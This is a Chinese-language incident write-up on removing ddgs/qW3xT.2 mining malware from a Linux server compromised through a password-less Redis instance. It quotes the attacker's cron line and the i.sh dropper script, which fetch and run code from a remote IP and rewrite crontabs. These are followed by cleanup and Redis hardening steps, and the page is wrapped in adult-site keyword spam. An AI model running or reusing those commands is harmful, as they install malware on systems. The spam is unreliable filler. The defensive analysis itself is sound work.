亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 服務器 > Linux服務器 > 正文

linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄

2024-09-05 23:05:00
字體:
來源:轉載
供稿:網友

前言

隨著虛擬貨幣的瘋狂炒作,挖礦病毒已經成為不法分子利用最為頻繁的攻擊方式之一。病毒傳播者可以利用個人電腦或服務器進行挖礦,具體現象為電腦CPU占用率高,C盤可使用空間驟降,電腦溫度升高,風扇噪聲增大等問題。

本文主要介紹的是關于linux植入ddgs、qW3xT.2挖礦病毒的處理方法,下面話不多說了,來一起看看詳細的介紹吧

被入侵后的現象:

發現有qW3xT.2與ddgs兩個異常進程,消耗了較高的cpu,kill掉后 過一會就會重新出現。

linux,服務器,ddgs,qW3xT.2,挖礦病毒

kill 掉這兩個異常進程后,過一段時間看到了如下進程:

linux,服務器,ddgs,qW3xT.2,挖礦病毒

首先在/etc/sysconfig/crotnab中的定時任務沒有找到定時腳本,輸入crontab -e 在其中找到了該定時任務

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
<span style="font-size: 15px;">查詢了下149.56.106.215在美國,i.sh 腳本內容如下:</span>
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "" > /var/spool/cron/rootecho "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/rootecho "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/rootmkdir -p /var/spool/cron/crontabsecho "" > /var/spool/cron/crontabs/rootecho "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/rootecho "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/rootps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013if [ ! -f "/tmp/ddgs.3013" ]; then wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013 curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013fichmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs killps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs killps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs killps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs killps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs killps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

處理方法:

1.刪除  crontab -e 中

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

2.清除/root/.ssh/authorized_keys 中黑客設置的免密登錄內容

3.修改redis密碼

4.修改root與登錄賬戶密碼

安全建議:

1.配置bind選項,限定可以連接Redis服務器的IP,修改 Redis 的默認端口6379 配置認證,也就是AUTH,設置密碼,密碼會以明文方式保存在Redis配置文件中

2.配置rename-command 配置項 “RENAME_CONFIG”,這樣即使存在未授權訪問,也能夠給攻擊者使用config 指令加大難度

3.如果可以在防火墻中屏蔽redis外網      

入侵方式:

收集了相關資料,了解到其是利用redis漏洞,未設置密碼或密碼太簡單,導致的被入侵。

reids修改密碼方法如下:

redis-cli -h 127.0.0.1 -p 6379config get requirepass ##獲取當前密碼config set requirepass "yourpassword" ##設置當前密碼,服務重新啟動后又會置為默認,即無密碼;

永久生效方法為,打開redis配置文件redis.conf,找到requirepass值修改密碼,如下:

requirepass yourpassword ##此處注意,行前不能有空格

總結

以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作具有一定的參考學習價值,如果有疑問大家可以留言交流,謝謝大家對VEVB武林網的支持。


注:相關教程知識閱讀請移步到服務器教程頻道。
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
久久影院资源站| 久久久久久久一区二区| 日韩视频免费在线| 日韩高清电影好看的电视剧电影| 91色在线视频| 国产成人a亚洲精品| 大荫蒂欧美视频另类xxxx| 国产精品视频不卡| 性欧美长视频免费观看不卡| 黑人巨大精品欧美一区二区| 国产精品久久9| 91国产美女视频| 裸体女人亚洲精品一区| 国产精品日韩在线| 国产精品美女久久久久av超清| 亚洲国产成人精品久久久国产成人一区| 91免费的视频在线播放| 亚洲片国产一区一级在线观看| 久久中文久久字幕| 日韩欧美高清视频| 国产精品视频中文字幕91| 国产精品偷伦视频免费观看国产| 国产精品综合久久久| 欧美激情中文网| 亚洲男人的天堂在线| 91超碰caoporn97人人| 日韩国产精品亚洲а∨天堂免| 青草青草久热精品视频在线网站| 久久视频国产精品免费视频在线| 成人黄色片在线| 国产精品久在线观看| 亚洲少妇激情视频| 亚洲精品不卡在线| 亚洲国产精品悠悠久久琪琪| 91精品国产自产在线观看永久| 成人黄色生活片| 欧美精品做受xxx性少妇| 欧美精品久久久久| 亚洲国产成人爱av在线播放| 91九色国产视频| 欧美日韩高清区| 国内精品小视频| 精品久久久久久久久久久久久久| 国产女人18毛片水18精品| 国模视频一区二区| 欧美性资源免费| 一本一本久久a久久精品综合小说| 日韩免费在线观看视频| 久久精品中文字幕电影| 精品久久久久久久久久久久| 亚洲欧美在线播放| 国产精品电影一区| 欧美激情网友自拍| 久久久久久这里只有精品| 羞羞色国产精品| 91免费视频网站| 色婷婷av一区二区三区在线观看| 爽爽爽爽爽爽爽成人免费观看| 欧美黄色成人网| 91牛牛免费视频| 中文字幕综合在线| 久久久久久69| www.xxxx精品| 不卡av电影在线观看| 97视频在线看| 亚洲欧洲xxxx| 欧美日韩加勒比精品一区| 亚洲国产黄色片| 国产精品久久国产精品99gif| 亚洲欧美在线免费观看| 成人免费直播live| 日本成人激情视频| 92裸体在线视频网站| 日韩av免费在线看| 国模精品视频一区二区| 国产91精品久久久久| 伊人成人开心激情综合网| 亚洲精品电影久久久| 欧美在线免费视频| 亚洲人成网站999久久久综合| 久久久噜久噜久久综合| www.欧美视频| 亚洲香蕉av在线一区二区三区| 免费成人高清视频| 国产午夜精品一区理论片飘花| 成人午夜两性视频| 中国china体内裑精亚洲片| 久久天天躁狠狠躁夜夜躁2014| 国产精品h片在线播放| 国产美女久久精品香蕉69| 亚洲女人被黑人巨大进入| 国产精品影院在线观看| 欧美成人亚洲成人| 亚洲精品久久久久中文字幕二区| 日韩亚洲一区二区| 精品无人区太爽高潮在线播放| 92版电视剧仙鹤神针在线观看| 国产免费一区二区三区香蕉精| 欧美电影在线观看高清| 91精品国产91久久久久久吃药| 欧美日韩国产二区| 国产69精品久久久久久| 亚洲性视频网站| 日本中文字幕不卡免费| 欧美性猛交xxxx久久久| 青草青草久热精品视频在线观看| 欧美亚洲午夜视频在线观看| 色偷偷偷综合中文字幕;dd| 国产欧美在线看| 亚洲成人在线视频播放| 欧美精品日韩三级| 亚洲欧美综合图区| 欧美有码在线观看| 搡老女人一区二区三区视频tv| 欧美在线日韩在线| 久久国产色av| 亚洲男人天堂九九视频| 国产精品美女免费视频| 亚洲精品综合久久中文字幕| 91视频免费在线| 亚洲伊人成综合成人网| 亚洲热线99精品视频| 国产精品黄色av| 亚洲天堂免费在线| 热久久免费视频精品| 亚洲国产99精品国自产| 国产一区深夜福利| 亚洲精品999| 国产精品www| 精品高清美女精品国产区| 久久久人成影片一区二区三区观看| 欧美理论在线观看| 久久久女人电视剧免费播放下载| 国产一区二区三区欧美| 九九热最新视频//这里只有精品| 亚洲一级免费视频| 欧美日韩在线视频观看| 国产免费一区二区三区香蕉精| 国产精品一区电影| 91网站在线免费观看| 精品亚洲一区二区三区在线播放| 51视频国产精品一区二区| 精品久久久久久国产91| 亚洲第一精品夜夜躁人人躁| 亚洲第一区中文字幕| 欧美精品中文字幕一区| 国产成人免费av电影| 一区二区日韩精品| 免费不卡在线观看av| 中文字幕亚洲综合久久| 97成人精品区在线播放| 亚洲精品美女久久久久| 久久亚洲精品成人| 国产精品久久久久久久久久久不卡| 精品美女久久久久久免费| 欧美在线视频一二三| 高跟丝袜欧美一区| 亚洲欧美日韩一区二区三区在线| 国产精品久久网| 欧美激情免费观看| 热99久久精品| 亚洲乱码国产乱码精品精天堂| 欧美在线一级视频| 国产精品电影久久久久电影网|